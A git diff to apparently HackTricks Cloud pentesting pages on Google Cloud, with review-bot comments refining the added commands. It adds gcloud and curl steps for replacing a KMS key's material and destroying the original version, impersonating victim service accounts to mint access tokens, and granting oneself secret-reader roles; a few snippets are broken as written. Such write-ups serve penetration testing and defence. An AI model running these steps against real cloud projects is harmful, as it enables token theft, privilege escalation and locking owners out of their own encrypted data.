diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md index 21ba80bdb..bbcaf76c5 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md +++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -90,6 +90,82 @@ gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_ * **Delete the KMS key** * Now only the attacker, who has the original key material could be able to decrypt the encrypted data +#### Here are the steps to import a new version and disable/delete the older data: + +```bash +# Encrypt something with the original key +echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt +gcloud kms encrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --plaintext-file my-plaintext-file.txt \ + --ciphertext-file my-encrypted-file.enc + +# Decrypt it +gcloud kms decrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --ciphertext-file my-encrypted-file.enc \ + --plaintext-file - + + +# Create an Import Job +gcloud kms import-jobs create my-import-job \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --import-method "rsa-oaep-3072-sha1-aes-256" \ + --protection-level "software" + +# Generate key material +openssl rand -out my-key-material.bin 32 + +# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent) +gcloud kms keys versions import \ + --import-job my-import-job \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --algorithm "google-symmetric-encryption" \ + --target-key-file my-key-material.bin + +# Get versions +gcloud kms keys versions list \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key + +# Make new version primary +gcloud kms keys update \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --primary-version 2 + +# Try to decrypt again (error) +gcloud kms decrypt \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --ciphertext-file my-encrypted-file.enc \ + --plaintext-file - + +# Disable initial version +gcloud kms keys versions disable \ 
+ --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key 1 + +# Destroy the old version +gcloud kms keys versions destroy \ + --location us-central1 \ + --keyring kms-lab-2-keyring \ + --key kms-lab-2-key \ + --version 1 + +``` + ### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation` ```python @@ -201,7 +277,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md index 37b2fb896..c5902ba77 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -36,6 +36,11 @@ You can find a script to automate the **creation, exploit and cleaning of a vuln An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. +```bash +gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \ + auth print-access-token +``` + You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccountKeys.create` 
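Review bot: the variable naming in the new `gcloud --impersonate-service-account` snippet (`${victim}`) is inconsistent with the `${VICTIM_SA}@${PROJECT_ID}` convention the same file uses in the setIamPolicy hunk below; use `${VICTIM_SA}` so readers can paste between sections. It would also help to mention the persistent form, `gcloud config set auth/impersonate_service_account "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com"`, since after that every subsequent `gcloud` call runs as the victim rather than only the one `print-access-token` invocation.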
@@ -58,9 +63,22 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) +Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly: + +```bash +curl -X POST \ + 'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \ + -H 'Content-Type: application/json' \ + -H 'Authorization: Bearer '"$(gcloud auth print-access-token)" \ + -d '{ + "delegates": ["projects/-/serviceAccounts/'"${DELEGATED_SERVICE_ACCOUNT}"'"], + "scope": ["https://www.googleapis.com/auth/cloud-platform"] + }' +``` + You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). -Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. + ### `iam.serviceAccounts.signBlob` 
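Review bot: the moved sentence now reads "the delegation of `gcloud` only works to generate a token using the generateAccessToken() method", which says the opposite of what the original line (now removed) meant: delegation is only supported by the generateAccessToken() API, which is why the `curl` call is needed instead of `gcloud`. Rewrite it as "Note that according to the documentation, delegation only works when generating a token with the generateAccessToken() method, so here is how to get a token using the API directly:". The curl snippet also uses `${TARGET_SERVICE_ACCOUNT}` and `${DELEGATED_SERVICE_ACCOUNT}` without defining them; add one line stating that `delegates` is the chain of intermediate service accounts (the one you hold implicitDelegation on) and the URL names the final service account whose token you want, since getting the order wrong is the usual reason the call returns 403. Minor: the removal leaves a stray empty `+` line, producing two consecutive blank lines before the `signBlob` heading.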
@@ -82,6 +100,11 @@ An attacker with the mentioned permissions will be able to **add IAM policies to gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ --member="user:username@domain.com" \ --role="roles/iam.serviceAccountTokenCreator" + +# If you still have prblem grant yourself also this permission +gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \ + --member="user:username@domain.com" \ + --role="roles/iam.serviceAccountUser" ``` You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** @@ -141,7 +164,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
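Review bot: in the `iam.serviceAccounts.setIamPolicy` hunk the first line of the second command ends in `\ \`, so bash passes a literal space as an extra argument to `gcloud` and the command fails; drop the extra backslash so the line ends in a single `\`. The comment `# If you still have prblem grant yourself also this permission` has a typo and does not say which problem: `roles/iam.serviceAccountTokenCreator` is what token generation (`getAccessToken`, `signBlob`, `signJwt`) needs, while `roles/iam.serviceAccountUser` (actAs) is what you need to attach the service account to a resource such as a VM or Cloud Function, so state that distinction instead of "if you still have problems".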
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md index 168fc5e7d..bc251cf7a 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md @@ -39,7 +39,13 @@ As this is also a post exploitation technique it can be found in: ### `secretmanager.secrets.setIamPolicy` -This give you access to give you access to read the secrets from the secret manager. +This give you access to give you access to read the secrets from the secret manager, like using: + +```bash +gcloud secrets add-iam-policy-binding \ + --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ + --role="roles/secretmanager.secretAccessor" +```
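Review bot: the `gcloud secrets add-iam-policy-binding` command in the secretmanager hunk is missing its required positional argument (the secret name) and the `--member` value `serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com` has an empty account name before the `@`, so it cannot run as written. Suggested form: `gcloud secrets add-iam-policy-binding "${SECRET_NAME}" --member="serviceAccount:${SA_NAME}@${PROJECT_ID}.iam.gserviceaccount.com" --role="roles/secretmanager.secretAccessor"`, followed by `gcloud secrets versions access latest --secret="${SECRET_NAME}"` to show the payoff. The lead-in sentence also keeps the duplicated "give you access to give you access" from the original line; rewrite it as "This lets you grant yourself permission to read the secrets, for example:".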
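Review bot: in the gcp-kms-post-exploitation.md hunk, the encrypt step writes the plaintext to `/tmp/my-plaintext-file.txt` but then passes `--plaintext-file my-plaintext-file.txt`, so the command only works when run from `/tmp`; use a single path. The two final commands also name the key version differently: `disable` tacks a bare `1` onto the `--key kms-lab-2-key` line, while `destroy` uses `--version 1`. gcloud documents the version as a positional argument for both `gcloud kms keys versions disable` and `gcloud kms keys versions destroy` (`--version` is the gcloud global flag that prints the SDK version, not a selector for this command), so write `gcloud kms keys versions disable 1 --location us-central1 --keyring kms-lab-2-keyring --key kms-lab-2-key` and the same shape for `destroy`. Since the point of the technique is to leave only the attacker able to decrypt, add a sentence that `destroy` only schedules the version for destruction and it can be restored during that window; a defender who notices can undo it. Minor: the new heading says "disable/delete the older data" but the commands disable/destroy the older key version, and "asymetrict" is a typo.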